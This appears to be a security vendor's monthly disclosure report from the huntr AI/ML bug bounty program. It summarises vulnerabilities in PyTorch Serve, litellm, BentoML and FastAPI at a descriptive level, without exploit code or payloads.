Introduction
At Protect AI we are taking a proactive approach to identifying and addressing security risks in AI systems, to provide the world with critical intelligence on vulnerabilities and how to fix them.
Protect AI’s huntr is the world's first AI/ML bug bounty program. Our community of 15,000+ members hunt for impactful vulnerabilities across the entire OSS AI/ML supply chain. Through our own research and the huntr community, we’ve found the tools used in the supply chain to build the machine learning models that power AI applications to be vulnerable to unique security threats. These tools are Open Source and downloaded thousands of times a month to build enterprise AI Systems. They also likely come out of the box with vulnerabilities that can lead directly to complete system takeovers via attacks such as unauthorized remote code execution or local file inclusion.
This report is our largest publication to date, and contains 48 vulnerabilities, growing 220% from the 15 vulnerabilities that were first reported in November. This trajectory is a testament to the efforts of our community of maintainers and researchers in helping us build a safer AI powered world.
It is important to note that all vulnerabilities were reported to the maintainers a minimum of 45 days prior to publishing this report, and we continue to work with maintainers to ensure a timely fix prior to publication. The table also includes our recommendations for actions to take immediately, if you have these projects in production. If you need help mitigating these vulnerabilities in the meantime, please reach out, we’re here to help. community@protectai.com.
This Months Top Vulnerabilities
Remote Code Execution in PyTorch Serve
https://huntr.com/bounties/f18ee3d1-8390-4de3-923a-5b453ba698a7
Impact: Allows attackers to execute arbitrary code on the server hosting PyTorch Serve.
PyTorch Serve is vulnerable to an attack where a remote user could upload a model that contains malicious code if PyTorch Serve were exposed to the network. This code is executed when the model is deployed, leading to potential remote code execution on the server. Maintainers have updated the security documentation to help prevent users from being vulnerable.
Server-Side Template Injection in BerriAI/litellm
https://huntr.com/bounties/a9e0a164-6de0-43a4-a640-0cbfb54220a4
Impact: Enables attackers to execute unauthorized commands on the server.
The hf_chat_template method in BerriAI's litellm project processes user input through the Jinja template engine without proper sanitization. This can be exploited to execute arbitrary commands on the server.
Insecure Deserialization in BentoML
https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68
Impact: Allows remote attackers to execute arbitrary code on the server.
BentoML is susceptible to an insecure deserialization vulnerability. By sending a specially crafted request, an attacker can execute arbitrary code on the server hosting the BentoML application.
Regular Expression Denial of Service (ReDoS) in FastAPI
https://huntr.com/bounties/dd680268-d735-4f33-a358-d827694ab035
Impact: Can cause the server to become unresponsive, leading to a denial of service.
FastAPI is vulnerable to a ReDoS attack under specific conditions when parsing Form data. This vulnerability can be exploited to make the server unresponsive by consuming all available CPU resources.